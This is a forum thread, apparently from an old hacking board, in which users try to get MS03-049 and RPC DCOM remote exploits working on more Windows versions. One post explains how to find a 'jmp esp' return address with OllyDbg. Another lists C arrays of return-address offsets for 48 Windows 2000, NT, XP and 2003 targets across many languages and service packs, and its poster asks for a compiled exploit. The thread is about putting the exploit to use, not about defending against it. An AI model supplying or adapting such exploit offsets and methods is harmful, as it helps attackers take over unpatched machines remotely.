
Basti
Hi m8s, where can I find other offsets for the MS03049 exploit ( http://www.governmentsecurity.org/forum/in...?showtopic=4352 ) << this one - or how can I find out..

I'm interested if there are WORKING offsets for the other SPs and for all languages, and if there are offsets for NTFS, too. 'Cause this exploit is only for W2k SP4/SP1 English FAT32.


can anybody help?


greetz basti
Steffan
Maybe here U can find what U need, if they still have the const. kit to get offsets ...

http://www.m00.ru

C'ya
barabas
To find the offset for your version:

Open services.exe with OllyDbg.
Select: View -> Executable modules

Double-click user32.dll.

Right-click and search for the command jmp esp.

There you have the offset.
pupkinvasya

see
Windows RPC DCOM Remote Exploit with 48 TARGETS

48 Targets -- 48 Offsets
xaph
If someone is programming a 0349 exploit for German systems and win2k, plz post here or PM me.

greetz xapH
barabas
QUOTE
see
Windows RPC DCOM Remote Exploit with 48 TARGETS

48 Targets -- 48 Offsets


hahaha...

You think you can use offsets for different DLLs for everything?? Good luck
xaph
char winntsp4eng[] = "\xe5\x27\xf3\x77"; /* English winNT sp4 */
char winntsp5cn[] = "\xcf\xda\xee\x77"; /* china winNT sp5 */
char winntsp6cn[] = "\xac\x0e\xf0\x77"; /* china winNT sp6 */
char winntsp6acn[] = "\xc3\xea\xf0\x77"; /* china NT sp6a */
char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
char win2knospchi[] = "\x2a\xe3\xe2\x77"; /* china win2k nosp */
char win2ksp1chi[] = "\x8b\x89\xe6\x77"; /* china win2k sp1 */
char win2ksp2chi[] = "\x2b\x49\xe0\x77"; /* china win2k sp2 */
char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
char win2knospjap[] = "\xe5\x27\xf3\x77"; /* Japanese win2k nosp */
char win2ksp1jap[] = "\x8b\x89\xe5\x77"; /* Japanese win2k sp1 */
char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
char win2knospkr[] = "\x2a\xe3\xe1\x77"; /* Korea win2k nosp */
char win2ksp1kr[] = "\x8b\x89\xe5\x77"; /* Korea win2k sp1 same offset as win2kjp_sp1 ??*/
char win2ksp2kr[] = "\x2b\x49\xdf\x77"; /* Korea win2k sp2 */
char win2knospmx[] = "\x2a\xe3\xe1\x77"; /* Mexican win2k nosp */
char win2ksp1mx[] = "\x8b\x89\xe8\x77"; /* Mexican win2k sp1 */
char win2knospken[] = "\x4d\x3f\xe3\x77"; /* Kenya win2k sp1 */
char win2ksp1ken[] = "\x8b\x89\xe8\x77"; /* Kenya win2k sp1 */
char win2ksp2ken[] = "\x2b\x49\xe2\x77"; /* Kenya win2k sp1 */
char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */
char win2k3nospeng[] = "\xb0\x54\x22\x77"; /* english win2k3 */
char Win2ksp3ger[] = "\x29\x2c\xe3\x77"; /* German win2 sp3 */
char Win2ksp4ger1[] = "\x29\x4c\xe0\x77"; /* German win2 sp4 1 */
char Win2ksp4ger2[] = "\x56\xc2\xe2\x77"; /* German win2 sp4 2 */
char winxpsp1ger[] = "\xfc\x18\xd4\x77"; /* German xp sp1 */
char Win2ksp1fr[] = "\x4b\x3e\xe4\x77"; /* French win2k Server SP1 */
char Win2ksp4fr[] = "\x56\xc2\xe2\x77"; /* French win2k Server SP4 */
char winxpsp0fr[] = "\x4a\x75\xd4\x77"; /* French win xp no sp */
char winxpsp1fr[] = "\xfc\x18\xd4\x77"; /* French win xp sp 1 */
char win2ksp3big[] = "\x25\x2b\xaa\x77";
char win2ksp4big[] = "\x29\x4c\xdf\x77";
char winxpsp01big[] = "\xfb\x7b\xa1\x71";

Here you have all offsets from the 48 target exploit! Could you plz send me a compiled version too, PM me or something, I can't compile the source for Windows 'cause I don't have those libraries...

greetz XaPH
320X
mmm... good job xaph, I will test it, thnx for the post
teest
Is that offset from DCOM 48 targets? It shouldn't work...
Cyrus
QUOTE

To find the offset for your version:

Open services.exe with OllyDbg.
Select: View -> Executable modules

Double-click user32.dll.

Right-click and search for the command jmp esp.

There you have the offset.


I did that; my results are:

Found commands, item 1
Address=77D4643D
Disassembly=JMP ESP

And I'm on Win XP Pro SP1 German.
Invision Power Board © 2001-2005 Invision Power Services, Inc.